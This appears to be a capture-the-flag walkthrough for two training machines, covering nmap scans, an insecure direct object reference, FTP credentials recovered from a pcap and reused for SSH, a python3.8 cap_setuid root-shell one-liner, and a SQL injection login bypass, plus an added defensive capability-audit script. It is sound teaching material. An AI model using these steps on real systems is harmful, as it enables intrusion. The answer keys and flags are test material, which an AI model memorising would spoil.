1.cap

1.How many TCP ports are open?

Scan with nmap using the following command:

nmap -sV -sC -O -T4

Ports 21, 22 and 80 are open.

answer: 3

2.After running a “Security Snapshot”, the browser is redirected to a path of the format /[something]/[id], where [id] represents the id number of the scan. What is the [something]?

Open the site in a browser; after clicking, it redirects automatically to /data/1.

answer: data

3.Are you able to get to other users’ scans?

Requesting /data/0 succeeds.

answer: yes

4.What is the ID of the PCAP file that contains sensitive data?

Visit /data/0 and click download to get 0.pcap. CTFNeta extracts the username and password from it.

# user:nathan
# passwd:Buck3tH4TF0RM3!

answer: 0

5.Which application layer protocol in the pcap file can the sensitive data be found in?

0.pcap contains the FTP username and password.

answer: ftp

6.We’ve managed to collect nathan’s FTP password. On what other service does this password work?

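The earlier port scan showed that port 22 is also open. Guessing that the username and password are reused, the SSH login succeeds.

answer: ssh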

7.Submit the flag located in the nathan user’s home directory.

Connect over SSH, run ls, then cat user.txt to get the flag.

8.What is the full path to the binary on this machine that has special capabilities that can be abused to obtain root privileges?

Upload linpeas.sh to the remote host:

scp ~/linpeas.sh nathan@10.129.37.234:~/

Running it shows that /usr/bin/python3.8 carries cap_setuid.

python3.8 -c 'import os; os.setuid(0); os.system("id && whoami && bash -p")'

This escalates privileges to root.

answer: /usr/bin/python3.8
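
As an added example (not part of the original writeup and not linpeas code), this Python audit finds binaries like the one above from the defender's side by decoding the `security.capability` extended attribute (the kernel's `struct vfs_cap_data`) and flagging risky permitted capabilities. The `DANGEROUS` selection, the function names and the `SAMPLE` bytes are assumptions made for illustration.

```python
import os
import struct

# Capability bits (linux/capability.h) commonly abusable for privilege escalation.
DANGEROUS = {1: "cap_dac_override", 2: "cap_dac_read_search", 6: "cap_setgid",
             7: "cap_setuid", 16: "cap_sys_module", 19: "cap_sys_ptrace",
             21: "cap_sys_admin"}
EFFECTIVE_FLAG = 0x000001  # VFS_CAP_FLAGS_EFFECTIVE
# Revision (top byte of magic_etc) -> number of 32-bit permitted/inheritable pairs.
REVISIONS = {0x01000000: 1, 0x02000000: 2, 0x03000000: 2}

def parse_vfs_caps(raw: bytes) -> dict:
    """Decode a security.capability xattr (struct vfs_cap_data, little-endian)."""
    if len(raw) < 4:
        raise ValueError("xattr too short")
    (magic,) = struct.unpack_from("<I", raw, 0)
    pairs = REVISIONS.get(magic & 0xFF000000)
    if pairs is None or len(raw) < 4 + 8 * pairs:
        raise ValueError("unknown revision or truncated xattr")
    permitted = 0
    for i in range(pairs):
        # Each pair is (permitted, inheritable); only permitted is needed here.
        (low32,) = struct.unpack_from("<I", raw, 4 + 8 * i)
        permitted |= low32 << (32 * i)
    return {"permitted": permitted, "effective": bool(magic & EFFECTIVE_FLAG)}

def dangerous_caps(raw: bytes) -> list:
    """Names of flagged capabilities present in the file's permitted set."""
    permitted = parse_vfs_caps(raw)["permitted"]
    return [name for bit, name in sorted(DANGEROUS.items())
            if (permitted >> bit) & 1]

def audit(root: str) -> dict:
    """Walk a tree and map each file to its flagged capabilities (Linux only)."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                raw = os.getxattr(path, "security.capability", follow_symlinks=False)
                hits = dangerous_caps(raw)
            except (OSError, ValueError):
                continue  # no capability xattr, unreadable, or malformed
            if hits:
                findings[path] = hits
    return findings

# Constructed sample xattr: revision 2, effective bit set, cap_setuid permitted.
SAMPLE = struct.pack("<IIIII", 0x02000001, 1 << 7, 0, 0, 0)
```

Calling `audit("/usr/bin")` on a host returns a path-to-capabilities mapping; an interpreter appearing in it should have the capability removed with `setcap -r`.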

9.Submit the flag located in root’s home directory.

Read /root/root.txt:

4f6d64b33dfc0ce5062bdc797e4e7680

2.Appointment

1.What does the acronym SQL stand for?

answer: Structured Query Language

2.What is one of the most common type of SQL vulnerabilities?

answer: sql injection

3.What is the 2021 OWASP Top 10 classification for this vulnerability?

answer: A03:2021-Injection

4.What does Nmap report as the service and version that are running on port 80 of the target?

Scan with nmap; the result is as follows:

sudo nmap -Pn -sV 10.129.128.37
Starting Nmap 7.99 ( https://nmap.org ) at 2026-04-21 11:37 +0800
Nmap scan report for 10.129.128.37
Host is up (0.44s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.35 seconds

answer: Apache httpd 2.4.38 ((Debian))

5.What is the standard port used for the HTTPS protocol?

answer: 443

6.What is a folder called in web-application terminology?

answer: directory

7.What is the HTTP response code that is returned for Not Found errors?

answer: 404

8.Gobuster is one tool used to brute force directories on a webserver. What switch do we use with Gobuster to specify we’re looking to discover directories, and not subdomains?

answer: dir

9.What single character can be used to comment out the rest of a line in MySQL?

answer: #

10.If user input is not handled carefully, it could be interpreted as a comment. Use a comment to login as admin without knowing the password. What is the first word on the webpage returned?

Visit the HTTP service and try SQL injection. Submitting

username: admin' #
password: 0

logs in successfully and returns the flag.